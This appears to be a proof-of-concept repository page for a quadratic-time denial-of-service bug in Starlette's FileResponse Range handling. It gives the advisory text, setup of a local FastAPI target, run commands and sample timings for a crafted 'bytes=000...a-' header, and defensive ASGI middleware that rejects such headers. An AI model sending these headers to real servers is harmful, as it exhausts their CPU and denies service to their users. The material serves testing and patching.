
CVE-2025-62727 PoC — Starlette vulnerable to O(n^2) DoS via Range header merging in starlette.responses.FileResponse

Associated Vulnerability
Title: Starlette vulnerable to O(n^2) DoS via Range header merging in starlette.responses.FileResponse (CVE-2025-62727)
Description: Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1, an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial-of-service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.
Description
Proof of concept of CVE-2025-62727 that can cause denial-of-service in FastAPI (based on Starlette <= 0.48.0)
Readme
# CVE-2025-62727 Demo

## Victim Description

The target victim of CVE-2025-62727 is a simple FastAPI app that:

- Serves `Hello World` at `/`.
- Serves static files under `/static` using Starlette's `StaticFiles`.
- Auto-generates text files containing `A` repeated N times for N in `1024, 2048, ..., 50176` (every multiple of 1024 in that range) on startup.

## How to run the victim

1. (Optional) Create and activate a virtualenv.
2. Install dependencies:

   ```bash
   pip install -r requirements.txt
   ```

3. Start the server:

   ```bash
   uvicorn main:app --reload
   ```

4. Open:

   - `http://127.0.0.1:8000/` for the index page.
   - `http://127.0.0.1:8000/static/1024.txt` etc. for static files.

## Notes

- Static files are generated under the `static/` directory on app startup. Existing files are not overwritten.
- Static serving uses Starlette's `StaticFiles`, which returns files through `FileResponse`, the component whose Range handling is affected by this CVE.

## PoC: CVE-2025-62727 (Range header parsing)

The included `poc.py` triggers CPU-heavy Range parsing in Starlette's `FileResponse` via the `/static` route using a crafted header of the form `bytes=000...000a-`.

Run the server, then in another shell:

```bash
python3 poc.py --sizes 1000,2000,4000,7000
```

Override the target URL (optional):

```bash
python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000
```

Notes:
- The PoC targets `http://127.0.0.1:8000/static/50176.txt` by default (a file the app generates). Use `--url` to change it.
- Adjust `--sizes` downward if you see 400/431 (header too large), or upward if headers succeed and you want a stronger effect.

Result example:
```bash
$ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
[INFO] Target: http://127.0.0.1:8000/static/50176.txt
[MODE] regex (header = 'bytes=' + '0'*N + 'a-')
N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
```
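The elapsed times above grow much faster than the header length, which is the quadratic cost the advisory describes; note that Starlette only answers 400 after doing that work. Upgrading to 0.49.1 is the fix; as defense in depth while upgrading, a cheap pre-check in front of the app can refuse such headers before `FileResponse` ever parses them. The pure-ASGI middleware below is an added example, not code from this PoC repository or from Starlette; the 256-byte / 16-spec limits and the `simulate` helper are assumptions for illustration.

```python
import asyncio
import re

# A byte-range spec is "start-end", "start-" or "-suffix"; digit runs are bounded so the
# pattern is cheap and never walks a 10k-digit header like the PoC's "bytes=000...a-".
_SPEC = r"(?:[0-9]{1,19}-[0-9]{0,19}|-[0-9]{1,19})"
_RANGE_RE = re.compile(r"^bytes=\s*" + _SPEC + r"(?:\s*,\s*" + _SPEC + r")*\s*$")
MAX_RANGE_HEADER_LEN = 256  # assumed limits: small, fixed, and generous for real clients
MAX_RANGE_SPECS = 16

def range_header_is_acceptable(value, max_len=MAX_RANGE_HEADER_LEN, max_specs=MAX_RANGE_SPECS):
    """O(1) length cap first, then the bounded pattern, then a cap on the number of specs."""
    if len(value) > max_len or not _RANGE_RE.match(value):
        return False
    return value.count(",") + 1 <= max_specs

class RangeHeaderGuard:
    """Pure-ASGI middleware: answer 400 to oversized or malformed Range headers so the
    request never reaches FileResponse's own Range parsing. Wire it up with
    app.add_middleware(RangeHeaderGuard) in the FastAPI/Starlette app."""
    def __init__(self, app, max_len=MAX_RANGE_HEADER_LEN, max_specs=MAX_RANGE_SPECS):
        self.app, self.max_len, self.max_specs = app, max_len, max_specs

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http":
            for name, value in scope.get("headers", []):
                if name.lower() == b"range" and not range_header_is_acceptable(
                        value.decode("latin-1"), self.max_len, self.max_specs):
                    await send({"type": "http.response.start", "status": 400,
                                "headers": [(b"content-type", b"text/plain")]})
                    await send({"type": "http.response.body", "body": b"Bad Range header"})
                    return
        await self.app(scope, receive, send)

def simulate(headers):
    """Drive the guard offline with a constructed ASGI scope and a stub app (assumed
    helper, no server needed). Returns (status, reached_app)."""
    sent, reached = [], []
    async def stub_app(scope, receive, send):
        reached.append(True)
        await send({"type": "http.response.start", "status": 200, "headers": []})
        await send({"type": "http.response.body", "body": b"ok"})
    async def send(message):
        sent.append(message)
    async def receive():
        return {"type": "http.request", "body": b"", "more_body": False}
    asyncio.run(RangeHeaderGuard(stub_app)({"type": "http", "headers": headers}, receive, send))
    return sent[0]["status"], bool(reached)
```

`simulate([(b"range", b"bytes=" + b"0" * 4000 + b"a-")])` returns `(400, False)`, i.e. the PoC-style header is refused without the app being called, while `simulate([(b"range", b"bytes=0-1023")])` returns `(200, True)`.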
File Snapshot

```
[4.0K] /data/pocs/fdc453a0dbc2d3a8be65621421d230cb4ae1fca3
├── [2.1K] main.py
├── [2.3K] poc.py
├── [2.0K] README.md
├── [ 431] requirements.txt
└── [4.0K] static
    ├── [ 10K] 10240.txt
    ├── [1.0K] 1024.txt
    ├── [ 11K] 11264.txt
    ├── [ 12K] 12288.txt
    ├── [ 13K] 13312.txt
    ├── [ 14K] 14336.txt
    ├── [ 15K] 15360.txt
    ├── [ 16K] 16384.txt
    ├── [ 17K] 17408.txt
    ├── [ 18K] 18432.txt
    ├── [ 19K] 19456.txt
    ├── [ 20K] 20480.txt
    ├── [2.0K] 2048.txt
    ├── [ 21K] 21504.txt
    ├── [ 22K] 22528.txt
    ├── [ 23K] 23552.txt
    ├── [ 24K] 24576.txt
    ├── [ 25K] 25600.txt
    ├── [ 26K] 26624.txt
    ├── [ 27K] 27648.txt
    ├── [ 28K] 28672.txt
    ├── [ 29K] 29696.txt
    ├── [ 30K] 30720.txt
    ├── [3.0K] 3072.txt
    ├── [ 31K] 31744.txt
    ├── [ 32K] 32768.txt
    ├── [ 33K] 33792.txt
    ├── [ 34K] 34816.txt
    ├── [ 35K] 35840.txt
    ├── [ 36K] 36864.txt
    ├── [ 37K] 37888.txt
    ├── [ 38K] 38912.txt
    ├── [ 39K] 39936.txt
    ├── [ 40K] 40960.txt
    ├── [4.0K] 4096.txt
    ├── [ 41K] 41984.txt
    ├── [ 42K] 43008.txt
    ├── [ 43K] 44032.txt
    ├── [ 44K] 45056.txt
    ├── [ 45K] 46080.txt
    ├── [ 46K] 47104.txt
    ├── [ 47K] 48128.txt
    ├── [ 48K] 49152.txt
    ├── [ 49K] 50176.txt
    ├── [5.0K] 5120.txt
    ├── [6.0K] 6144.txt
    ├── [7.0K] 7168.txt
    ├── [8.0K] 8192.txt
    └── [9.0K] 9216.txt

2 directories, 53 files
```